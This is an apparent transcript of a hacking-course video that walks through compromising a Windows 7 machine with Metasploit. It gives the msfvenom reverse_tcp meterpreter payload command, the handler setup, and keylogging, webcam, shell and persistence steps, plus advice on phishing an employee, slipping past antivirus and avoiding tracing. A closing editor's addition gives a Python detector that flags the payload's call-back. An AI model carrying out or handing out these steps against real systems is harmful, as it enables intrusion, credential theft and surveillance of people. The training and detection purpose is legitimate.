Welcome to Part Five of this module. We're now ready to hack a Windows PC for the very first time. For this demonstration I'm going to be using a 32-bit installation of Windows 7 Professional Service Pack 1, running on a virtual machine. There are a couple of things to note about this going in. This is our first attempt to penetrate a Windows system using Metasploit, so I'm purposefully keeping things very simple for this first test so that students can follow along without any undue difficulty. There are obviously a great many different ways to do this, and those of you who already have experience with Metasploit might turn your nose up at the simplicity of this first round. The second thing to be aware of is that this method is going to require a few extra steps involving port forwarding if you plan to attempt it against a target that is not on your local network. These will be covered in a subsequent video very soon. Because we're keeping this first foray as straightforward as possible, the target machine has no antivirus or other special defenses running. We will be looking at how to deal with those in a future video. So here is the scenario. We are a penetration tester contracted by a large company to test network security. We have either been given access or hacked into the wireless network.
We are now on the network, we've done our network reconnaissance, and we know which machines are which. More than that, we did our research into this company using tools like Maltego and recon-ng, so we know a bit about who is who in the company: we know who the important people are and we know their email addresses. So with all of that in mind, what we want to do is use Metasploit to gain initial access to an important computer on the network. Again, things are being kept very simple for this first demonstration, so pretend that the network administrator is a chimpanzee and there is absolutely no special security at all. And sometimes that's not actually too far from the truth. So our first step, as always, is going to be to start up the msfconsole. If you need a refresher on how to do that, you would just type service postgresql start and then you would follow that up with msfconsole. To save time I've already done that, of course. Now, as counter-intuitive as this might seem, what we need is our own IP address rather than the target machine's. Remember that regular commands, for the most part, route right through the msfconsole, so all we have to do is type ifconfig and copy the address that we see. This will be our network address. Great. We have our network IP.
Now of course, like I said, there are many ways we could proceed with what we want to do. You've already seen how to scan a target for potential vulnerabilities and use the search function to try to find an exploit for it. This time we're going to create a payload using msfvenom that we're going to send to our target machine. So we start by typing msfvenom. I want to quickly point out that in the old days the command was msfpayload. Even though that command is now obsolete, you'll still run into it being used on some specialized distributions of Metasploit. However, in Kali it's msfvenom. So we're going to create a payload. To do this we're going to type msfvenom -p, and it's going to be a meterpreter payload for Windows, so we're gonna say windows/meterpreter/reverse_tcp. If you've been following these videos in order, and I hope you have, you should be familiar with how the reverse TCP looks. So then we're gonna give it LHOST, and this is going to be the IP address of our Kali machine. I want to be clear: this is not the IP address of the target like you would probably think; this is our own network address that we just got with the ifconfig command. So in this case that's going to be 10.0.0.21, and yours will vary.
And now we need to set the LPORT, so we're going to give that LPORT=4444. We're gonna do -f for the format, which is going to be exe. You could play around with different formats; as I said, I'm keeping things simple for this first demonstration. And then we will do a forward slash, and we could create the payload anywhere. I'm going to create the payload on the desktop just for simplicity's sake, so /root/Desktop/. And now we'll give the payload a name. Now, you would probably want to name this something innocuous like, I don't know, rundll or something that would be unlikely to be noticed were it to be seen in a task window. For the sake of clarity I'm just going to name it payload.exe. Once this is done we press enter. Two other things I should note here. First, because I did not use -a to specify an architecture, it's going to put out an x86 or 32-bit payload by default. You may need to throw in that extra switch to specify 64-bit or x64 depending on the target machine that you're going after. Also, please be aware that in this first demonstration no encoder is being used. I'll talk about what that means in a second. Generating the payload should probably take a few minutes. Actually, here it goes.
Now if we flip over to the desktop for a second, we can see that the payload was generated there: payload.exe. This is because, as I said, I specified the path /root/Desktop. And again, you could create it anywhere you want and you can name it anything you want. The payload is going to give us remote access to the computer that we wish to hack into. I said a moment ago that no encoder was used. We also gave it a stupidly obvious name by calling it payload. So no chimpanzee in their right mind would click on this, and if they did it should trigger any antivirus software worthy of the name. Just to show you what I mean, if we quickly pull up VirusTotal or any other scanning service that we prefer and upload the file, we can see that it is almost universally detected as a virus or a Trojan by literally every antivirus software out there. Needless to say, this isn't going to cut it in a real-world scenario. This is why in practice we need to take additional steps such as using an encoder or a crypter to mask the true nature of the file so that it slips past antivirus. We would probably also want to use a third-party program to attach our malicious payload to a more innocent-looking file such as a PDF. This would allow us to create a Trojan horse, causing the payload to be activated any time the file that it is attached to is opened.
More on this later. But remember, in this first demo the system administrator is a chimpanzee who is too busy eating bananas to worry about installing antivirus or countermeasures. And because we know who is who in the company thanks to our work with recon-ng and Maltego and other tools like them, we know that a particularly good employee to send our payload to is Bob. Bob works in accounts and his security practices are terrible. He trusts the chimp to keep him safe and doesn't think twice about opening any emails he gets sent, and we have his email through the programs that have been mentioned. So we could send him the payload by email and tell Bob that he has won a million dollars; all he has to do is download the payload and run it. Or maybe we could encode the payload so that it won't be detected, then attach it to a PDF that contains instructions on how Bob can claim his prize. Either way, Bob downloads it, runs it, and we're in. Bob isn't too bright. And before you say this couldn't possibly happen, no one in the real world would be this stupid, I would point out that highly placed members of a certain political campaign in the American 2016 election fell for exactly this trick with disastrous results. Yes, you need to be clever, but people really are this gullible.
At any rate, what we're actually going to do, just again for this demonstration, is to pretend that we are Bob. We manually transfer our payload over to the Windows system and then run it. Remember, it doesn't matter how the payload gets to the target; there are countless methods. But before Bob opens the payload we're going to need to be ready by loading up the correct exploit. So to begin with we're going to type use exploit/multi/handler. As always, the exploit appears in red as part of the prompt, indicating that it is now loaded. Now we need to set the LHOST within the exploit. This is exactly what you saw in the previous videos, except that we're going to supply the LHOST of our own network IP for the Kali machine that we're currently using. Again, yours will vary. set LHOST 10.0.0.21, which in this case is the one I'm using. And now we need to set the port: set LPORT 4444. And we'll show options. OK. Everything looks ready. We are locked and loaded, so we just type exploit. Now we play the waiting game. We've started a reverse TCP handler on our own machine using port 4444.
Now we can sit here until the cows come home, but nothing is going to happen until Bob or someone else double-clicks on the payload that we created. Once that happens, the payload will establish a connection with us and we'll have a meterpreter session. To simulate Bob opening up the payload, we need to go on to our target machine and double-click payload.exe. Remember to only do this on a virtual machine if you are following along. So I'm going to go ahead and do that now. Bob has just opened up the payload, and there we go: with big shining eyes, Bob just opened up payload.exe hoping to claim his cash prize. Sadly for Bob, we now have a meterpreter session directly into his computer for as long as the system stays up. We pretty much own it from here. The sky's the limit. So let's start playing around a bit. We can do sysinfo to see what kind of computer it is, although we probably already knew that. We might, for instance, have obtained a list of email addresses for every employee in the company using recon-ng; maybe we sent the same payload to 100 people and we just waited to get lucky. So what next? Well, let's go ahead and take a screenshot of the target computer and see what Bob sees. This saves a screenshot to our root directory, so I'll just pull that up.
It's a little small and blurry because our target is actually a virtual machine in windowed mode, but you get the idea. We can even take a picture of Bob through his own webcam, which won't actually work in this demonstration because the target is a virtual box. But again, you get the idea. That picture, just like the screenshot we just saw, will be saved in your root directory. We can start keylogging everything that Bob types by typing keyscan_start. And now let me just pull up a notepad and type something as Bob. So of course normally we just leave this running for the duration of the session, but let's see what Bob just typed by typing keyscan_dump. We can see that he has typed: Hello my name is Bob. Shifts are shown. My super secret password is wq123.
Please don't use wq123 as your super secret password. We can also execute a shell command and gain direct access as though we were sitting at the computer in front of the command prompt, by typing shell. From here we could run files, delete files, edit files, and if we wanted to keep long-term access we could back up into meterpreter again by typing the exit command once. Then we could use the upload command to send a bot or remote access server, then we could go back into shell and run it, thus ensuring that even after the meterpreter session ends we will always be able to obtain access again. We could turn the computer into a bot or use the remote access toolkit to hack into it later without having to resort to Metasploit at all. We could also set things up so that the payload gets automatically run invisibly as a cron job, let's say every 10 minutes or whatever, thus allowing us to access the machine again using the same method that we are now without requiring anyone to actually open the payload manually. And all of that is just scratching the surface. We can download files using the download command, execute commands on the network that originate from that computer, pretty much anything you can think of, as if you were sitting in front of the computer yourself. We can also end the session by typing exit within meterpreter, or the session will automatically terminate when the system is shut down or rebooted, which I will now demonstrate. The point is that we need to be a bit quick once we have access if we want to ensure we keep access over the long term, so make sure you have a plan for what you want to accomplish once you're in. Ctrl-C followed by the exit command will end the session and bring us back to the msfconsole. Now, as was said at the start of this video, port forwarding is something we need to set up on the router if we plan to do this from a remote location rather than on the same network as the target machine. Be aware that if you do this you'll need to use your own IP address when configuring the payload, and a smart sysadmin who isn't some species of monkey can easily trace the connection right back to its point of origin. This is where virtual private servers and other anonymizing techniques come into play, but those are a subject for another video. If all else fails, your average hacker operating on a shoestring budget can always just use a coffee shop or something like it and therefore not have to worry about the IP being traced. And remember to have a good stern talk with Bob about his security practices after you finish your duly authorised penetration test and security audit. And as always:
Never use anything shown in this video or any other video in the series against anyone or anything you don't have written permission from the owner to penetration test. Be aware of the law and obey it at all times, and be ethical. In the next video we'll look at doing this same kind of thing but in more advanced ways that no longer assume our opponent is a chimpanzee. I hope you found this helpful and I'll see you next time.
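Editor's addition, not part of the video: the flip side of the demo above is what Bob's sysadmin could have seen. The unencoded windows/meterpreter/reverse_tcp executable sits on a user's Desktop and calls back to the handler on LPORT 4444, so a host network-connection log shows a process from a user-writable folder initiating an outbound connection to Metasploit's default port. The code below scores such events; the log lines are constructed in a simplified Sysmon Event ID 3 key=value style, and the field names, the port list and the path heuristic are assumptions for this example.

```python
"""Flag the reverse_tcp call-back pattern from the demo in host connection
logs.  Added example, not code from the video.  Field names follow a
simplified Sysmon Event ID 3 (network connection) layout; the suspect port
list and the user-writable-path heuristic are assumptions, not Sysmon."""
import re
from dataclasses import dataclass

# Metasploit's default LPORT, and the one the video uses.  Extend per site.
SUSPECT_PORTS = {4444}

# Executables launched from user-writable folders are a weak signal alone
# and a strong one when combined with a call-back to a suspect port.
USER_WRITABLE = re.compile(
    r"^C:\\Users\\[^\\]+\\(Desktop|Downloads|AppData)\\", re.IGNORECASE)

# Constructed sample log: one network-connection event per line.
SAMPLE_LOG = """\
Image=C:\\Windows\\System32\\svchost.exe Initiated=true DestinationIp=10.0.0.5 DestinationPort=443
Image=C:\\Users\\bob\\Desktop\\payload.exe Initiated=true DestinationIp=10.0.0.21 DestinationPort=4444
Image=C:\\Program Files\\Mozilla Firefox\\firefox.exe Initiated=true DestinationIp=93.184.216.34 DestinationPort=443
Image=C:\\Users\\bob\\Downloads\\setup.exe Initiated=true DestinationIp=10.0.0.9 DestinationPort=8080
Image=C:\\Windows\\System32\\svchost.exe Initiated=false DestinationIp=10.0.0.21 DestinationPort=4444
"""

# key=value pairs; values may contain spaces ("Program Files"), so a value
# runs until the next " Key=" token or the end of the line.
FIELD = re.compile(r"(\w+)=(.*?)(?= \w+=|$)")

@dataclass
class NetEvent:
    image: str        # full path of the process that made the connection
    initiated: bool   # True for outbound (process-initiated) connections
    dst_ip: str
    dst_port: int

def parse_event(line: str) -> NetEvent:
    f = dict(FIELD.findall(line))
    return NetEvent(f["Image"], f["Initiated"] == "true",
                    f["DestinationIp"], int(f["DestinationPort"]))

def score(ev: NetEvent) -> list[str]:
    """Return the reasons an event looks like a reverse-shell call-back."""
    reasons = []
    if ev.initiated and ev.dst_port in SUSPECT_PORTS:
        reasons.append(f"outbound to Metasploit default port {ev.dst_port}")
    if USER_WRITABLE.match(ev.image):
        reasons.append("binary runs from a user-writable folder")
    return reasons

def flag_suspicious(log_text: str) -> list[tuple[NetEvent, list[str]]]:
    """Parse every event and keep those with at least one reason."""
    alerts = []
    for line in log_text.splitlines():
        if line.strip():
            ev = parse_event(line)
            reasons = score(ev)
            if reasons:
                alerts.append((ev, reasons))
    return alerts

if __name__ == "__main__":
    for ev, reasons in flag_suspicious(SAMPLE_LOG):
        print(f"{ev.image} -> {ev.dst_ip}:{ev.dst_port}: " + "; ".join(reasons))
```

On the sample log, payload.exe is flagged on both counts, setup.exe only on its location, and the inbound svchost event on port 4444 is ignored because the process did not initiate it.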